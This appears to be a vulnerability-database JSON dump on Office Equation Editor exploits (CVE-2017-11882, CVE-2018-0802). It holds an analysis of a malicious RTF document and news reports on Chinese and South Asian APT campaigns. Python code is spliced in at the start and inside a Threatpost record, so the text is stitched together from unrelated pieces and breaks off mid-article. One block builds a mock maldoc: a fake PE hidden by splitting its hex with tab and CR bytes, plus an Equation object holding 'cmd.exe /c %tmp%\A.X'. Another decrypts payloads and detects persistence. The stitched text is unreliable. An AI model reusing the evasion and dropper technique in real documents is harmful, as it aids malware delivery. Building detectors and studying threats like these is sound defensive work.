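    pkg = (b"\x02\x00" + b"A.X\x00" + src + b"\x00" + struct.pack("<II", 0x00030000, len(tmp))
           + tmp + struct.pack("<I", len(fake_pe)) + fake_pe)
    fake_cfb = (CFB_MAGIC + b"\x00" * 8 + "eQuatiON native".encode("utf-16-le")
                + EQUATION_CLSID.bytes_le + b"cmd.exe /c %tmp%\\A.X\x00")
    pkg_hex = _ole1(b"Package", pkg).hex().encode()
    pkg_hex = b"\t\r".join(pkg_hex[i:i + 1] for i in range(len(pkg_hex)))
    eqn_hex = _ole1(b"Equation.3", fake_cfb).hex().encode()
    return (b"{\\rtf1{\\object\\objemb{\\*\\objdata " + pkg_hex + b"}}"
            b"{\\object\\objemb{\\*\\objdata " + eqn_hex + b"}}}")
```

On a real file, read its bytes and pass them to triage(); each finding carries the OLE1 class name, the flags that fired and, for a Package object, the original path the author left behind. The stream-name and CLSID checks are substring searches over the whole embedded blob rather than a parse of the compound-file directory, which is enough for triage but will also match the same bytes if they occur outside a directory entry.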
\n\nII. RTF analysis \n1. Document structure analysis \n![](/Article/UploadPic/2018-12/20181225205545186.png) \nAnalysing the document with rtfobj finds two embedded objects: a Package object and an Excel.Sheet.8 object, as shown in the figure. The Package object's original file path is \"C:\\Users\\n3o\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\A.X\", which reveals the document author's [operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>) user name: n3o. \nA.X is the dropped malicious PE file. \nThe other object is an embedded Excel sheet. Extracting it, renaming it with a .xls suffix and opening it in Excel shows that it contains two objects, AAAA and bbbb, both \"Equation.3\" objects, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545928.png) \nThe structure of the extracted Excel object is shown below. \n![](/Article/UploadPic/2018-12/20181225205545742.png) \nThe sheet contains two Microsoft Equation 3.0 objects with CLSID \"0002ce02-0000-0000-c000-000000000046\", MBD0002E630 and MBD0002E631, whose modification time is 2018/5/21 17:52. \n![](/Article/UploadPic/2018-12/20181225205545793.png) \nThe Ole10Native streams of the two \"Microsoft Equation 3.0\" objects are 59 bytes and 160 bytes in size and contain the string \"cmd.exe /c %tmp%\\A.X\", used to launch the A.X process. The two objects presumably correspond to CVE-2017-11882 and CVE-2018-0802, used in combination. \nWith this, the basic workings of the sample are clear; the overall flow is shown in the diagram below. \n![](/Article/UploadPic/2018-12/20181225205545654.png) \n2. Static analysis of the document \nOpening the file in WinHex, the first Package object can be found at file offset 0x2A8A. 
Here 0x00137158 is the size of the object, 1274200 in decimal, which is the size of the dropped A.X. The PE file follows. In WinHex we can see that the author has modified the PE header 0x4D5A by inserting the bytes 0x090d (tab, CR) between the hex digits, so that it becomes [0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d]. This is still 0x4d5a, but the trick presumably serves to evade certain anti-virus engines: the header is no longer rendered directly as 0x4d5a9000, which would identify a PE file at a glance. The details are shown below: \n![](/Article/UploadPic/2018-12/20181225205545840.png) \nAnother object, at offset 0x299061, is an Excel.Sheet.8 object. Its size is 0x00005C00, 23552 in decimal, consistent with the size of the Excel file extracted by rtfobj. The author has also altered the compound document header by splitting it with 0x0909 bytes, so that the d0cf11 at the start of the compound document becomes d[0x0909]0[0x0909].... This should likewise be a form of [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-25T00:00:00", "type": "myhack58", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2022-05-09T12:38:26", "description": "A Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to newly published research from Kaspersky. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit** and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. 
\"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure; RedCore also contains features that are exclusive to it, namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. 
\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of 2019. \n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. 
\"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-04T08:31:00", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-04T08:31:39", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:16", "description": "A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear 
submarines for the naval arm of the Russian Armed Forces.\n\nThe phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous \"Royal Road\" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed \"**PortDoor**,\" according to Cybereason's Nocturnus threat intelligence team.\n\n\"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,\" the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.\n\nRubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.\n\nFigure: content of the weaponized RTF document. \n \nOver the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. 
Known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) since at least late 2018, Royal Road attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets.\n\nThis newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of \"8.t,\" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called \"e.o\" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.\n\nSaid to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.\n\n\"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\" the researchers said.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-03T07:34:00", "type": "thn", "title": "New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-05-03T16:14:45", "id": "THN:8EAD85C313EF85BE8D38BAAD851B106E", "href": "https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:17", "description": "If you think that the CPU updates addressing this year's major security flaws\u2014[Meltdown and 
Spectre](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>)\u2014are the only ones you should install immediately, there are a handful of other major security flaws you need to pay attention to. \n \nMicrosoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office that had been actively exploited by several threat groups in the wild. \n \nSixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework. \n \nThe zero-day vulnerability ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)), described by Microsoft as a memory corruption flaw in Office, has already been targeted in the wild by several threat actor groups over the past few months. \n \nThe vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad. \n \nAccording to the company, this security flaw is related to CVE-2017-11882\u2014a 17-year-old [vulnerability in the Equation Editor](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) functionality (EQNEDT32.EXE), which Microsoft addressed in November. \n \nWhen researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a [blog post](<https://research.checkpoint.com/another-office-equation-rce-vulnerability/>) published by Check Point. 
\n \nBesides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office. \n \nA spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for Mac, which has been listed as publicly disclosed ([Mailsploit attack](<https://thehackernews.com/2017/12/email-spoofing-client.html>)), has also been addressed by the company. The vulnerability prevents some versions of Outlook for Mac from handling the encoding and display of email addresses properly, which can cause antivirus or anti-spam scanning not to work as intended. \n \nMicrosoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to have their invalid certificates treated as valid. \n \n\"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose,\" describes Microsoft. \"This action disregards the Enhanced Key Usage taggings.\" \n \nThe company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer. \n \nAll these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially-crafted webpage that triggers a memory corruption error, though none of these has been exploited in the wild yet. \n \nMeanwhile, Adobe has [patched](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) a single out-of-bounds read flaw (CVE-2018-4871) in Flash Player this month that could allow for information disclosure, though no active exploits have been seen in the wild. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals from taking control of their computers. 
\n \nTo install the security updates, go to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or install the updates manually.\n", "cvss3": {}, "published": "2018-01-09T19:35:00", "type": "thn", "title": "Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-0819", "CVE-2018-4871", "CVE-2018-0786"], "modified": "2018-01-11T07:11:17", "id": "THN:ED087560040A02BCB1F68DE406A7F577", "href": "https://thehackernews.com/2018/01/microsoft-security-patch.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-12T02:22:45", "description": "An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, 
[told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be a surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to accomplish its adversarial objectives.\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The 
trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution; this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. 
The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\nThe malicious documents download a template from various URLs; according to the analysis, these templates are RTF files built with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulting DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via an [HTTP GET request](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). 
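The decryption and persistence details quoted above, as an added example that is neither Check Point's code nor the malware's: RC4 with the reported key 123456 is applied to a payload and the result is accepted only if a PE image emerges, and a scheduled-task check matches the described "Windows Update" task running rundll32.exe on a .t file with the StartW export. The ciphertext it decrypts is a constructed fake DLL image encrypted here with the same routine; the regular expression and the task-name comparison are this example's assumptions about how the indicator would appear in a task's action string.

```python
import re

# Added example; not Check Point's code or the malware's. The key and the task
# details are the ones reported above; the sample ciphertext is constructed.
ROYALROAD_KEY = b"123456"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric, so one routine encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_like_pe(buf: bytes) -> bool:
    """'MZ' plus an e_lfanew that points at 'PE\\0\\0'. A wrong RC4 key yields noise
    that fails this, which is what makes blind decryption attempts safe to automate."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(buf[0x3C:0x40], "little")
    return buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_payload(encrypted: bytes, key: bytes = ROYALROAD_KEY):
    """Decrypt with the reported key; return the DLL image, or None if no PE emerges."""
    plain = rc4(key, encrypted)
    return plain if looks_like_pe(plain) else None


# Persistence indicator: a scheduled task named "Windows Update" whose action runs
# rundll32 on a dropped ".t" file with export StartW. The pattern is this example's
# assumption about how that action string looks; the names come from the analysis.
_RUNDLL_T_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^"\s,]+\.t)"?\s*,\s*StartW\b', re.I)


def suspicious_task(task_name: str, action: str) -> bool:
    return task_name.strip().lower() == "windows update" and bool(_RUNDLL_T_RE.search(action))


def constructed_sample() -> bytes:
    """A minimal fake DLL image (constructed, not a real sample), RC4-encrypted with
    the reported key so recover_payload() can be exercised offline."""
    image = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 20
    return rc4(ROYALROAD_KEY, image)


if __name__ == "__main__":
    print("recovered PE" if recover_payload(constructed_sample()) else "no PE with that key")
    print(suspicious_task("Windows Update", r'rundll32.exe C:\Users\alice\AppData\Local\Temp\5.t,StartW'))
```

The PE check is what turns a known key into a usable triage step: run recover_payload() over candidate blobs from a RoyalRoad document and only a real decryption passes, so a changed key in a new variant shows up as a miss rather than as garbage written to disk. The task check is deliberately loose about quoting and spacing around the comma, since that is the part of the action string an operator is most likely to vary.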
After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. 
And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the firm said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which are China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained an internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. 
\u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** for free.**\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. 
